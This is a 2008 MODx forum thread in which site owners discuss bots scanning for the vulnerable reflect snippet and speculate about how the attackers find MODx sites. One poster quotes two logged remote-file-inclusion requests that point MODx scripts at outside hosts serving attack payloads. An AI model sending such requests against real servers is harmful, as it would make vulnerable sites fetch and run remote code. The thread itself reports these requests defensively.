We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 33372
    • 1,611 Posts
    Quote from: ganeshXL at Dec 19, 2008, 12:23 AM

    Of course, you can remove this, but most ppl leave it in.
    I always remove it (it bugs me), and yet my sites are getting pinged for the reflect file. It wouldn’t be difficult to test for other known MODx files (I think I’d test for the manager login page if I were doing it), but I wondered if there were an easier way.
      "Things are not what they appear to be; nor are they otherwise." - Buddha

      "Well, gee, Buddha - that wasn't very helpful..." - ZAP

      Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
      • 10449
      • 956 Posts
      Perhaps someone just went to one of the "showcase" forums and got the URLs there. Or in fact any other forum where ppl post project-/client URLs.
        • 33372
        • 1,611 Posts
        Quote from: ganeshXL at Dec 19, 2008, 12:46 AM

        Perhaps someone just went to one of the "showcase" forums and got the URLs there. Or in fact any other forum where ppl post project-/client URLs.
        I also never, ever post client URLs anywhere, so that’s not how they found my sites.

        Not that those aren’t good ideas, though. Those are the first things that I would think of also. Perhaps the hack probers started with those methods, but they didn’t find my sites that way.
          "Things are not what they appear to be; nor are they otherwise." - Buddha

          "Well, gee, Buddha - that wasn't very helpful..." - ZAP

          Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
          • 27708 MODX Staff
          • 2,502 Posts
          It isn’t individual human hands hacking or attacking these sites. They are most likely using a scanning application either that does its own indexing looking for directory names or files or url strings etc. and then testing the query. Heck they could even attempt it on random sites in general and with the sheer volume of installs they’d hit some (although its unlikely).
            Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. Blog ✦ Twitter ✦ LinkedIn ✦ GitHub
            • 7231
            • 4,205 Posts
            Do people think that they’re just employing a brute force dragnet
            I don’t know. But looking at my modsec logs for the past few months over 90% is either the reflect request or this one:
            //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://belajarhack2008.webs.com/ide.txt??? HTTP/1.0
            Is this a new one or an old one? I seem to remember this from before.

            My modsec logs used to only have phpBB and Joomla bots (never installed either on my server) but now they are overcome with modx related notices. On my server I have a cross section of HTML pages, some custom PHP stuff, and a handful of MODx sites. Only the domains with modx sites are being targeted by bots, the other domains are not (could be coincidence). Only the site in my sig is linked to the forum but that one does not get as many attempts as others that are not and is only a few months old.

            I can trace back to the very first time a bot hit my server looking for reflect:
            Date: 2008-11-23 at 22:00:52
            From IP: 211.115.213.66
            Request: /modx//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1

            Since then there have been 9,334 blocked bot attempts recorded on my modsec logs. That is almost 50% of bots blocked in the entire year of 2008, since the bots started my logs have doubled in size (more activity in last 2 months than the other 10).

            I think that modx became the current target for the script kiddies, must be a tutorial someplace with instructions on how to build a bot to look for reflect.
              [font=Verdana]Shane Sponagle | [wiki] Snippet Call Anatomy | MODx Developer Blog | [nettuts] Working With a Content Management Framework: MODx

              Something is happening here, but you don't know what it is.
              Do you, Mr. Jones? - [bob dylan]
              • 27708 MODX Staff
              • 2,502 Posts
              Well the plus side is that it shows how popular and well known MODx has become. Hackers aim for the big fishes not for the unkowns. When we get an attempt at exploitation a quarter we’re "hot stuff".



                Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. Blog ✦ Twitter ✦ LinkedIn ✦ GitHub
                • 33372
                • 1,611 Posts
                Quote from: smashingred at Dec 19, 2008, 06:15 AM

                It isn’t individual human hands hacking or attacking these sites. They are most likely using a scanning application either that does its own indexing looking for directory names or files or url strings etc. and then testing the query. Heck they could even attempt it on random sites in general and with the sheer volume of installs they’d hit some (although its unlikely).
                If it’s just a brute force botnet, they may as well look for /assets/snippets/reflect/snippet.reflect.php on the first pass, since that both confirms that you’re using MODx and also that you have the file they’re looking for.

                What I’m wondering is whether there’s a list of known MODx sites being compiled by such a botnet in order to exploit future vulnerabilities quickly and without having to scan randomly. I would think that it would make sense for real hackers to do this for all major web applications, but I guess we may never know for sure. Anyone seen evidence of such probing before this vulnerability was discovered?

                It seems to me as if this went from secunia notice to major attack almost overnight.
                  "Things are not what they appear to be; nor are they otherwise." - Buddha

                  "Well, gee, Buddha - that wasn't very helpful..." - ZAP

                  Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
                  • 7231
                  • 4,205 Posts
                  What I’m wondering is whether there’s a list of known MODx sites being compiled by such a botnet in order to exploit future vulnerabilities quickly and without having to scan randomly.
                  If this was the case I would not be on the list since the bots are being blocked on my server and I have reg globals off. It seems that if there was a list only vulnerable sites would be on it, but you never know.

                  Probably originating from a disgruntle Joomla users jealous at all that we have over on this end of the pool and trying to get even.
                    [font=Verdana]Shane Sponagle | [wiki] Snippet Call Anatomy | MODx Developer Blog | [nettuts] Working With a Content Management Framework: MODx

                    Something is happening here, but you don't know what it is.
                    Do you, Mr. Jones? - [bob dylan]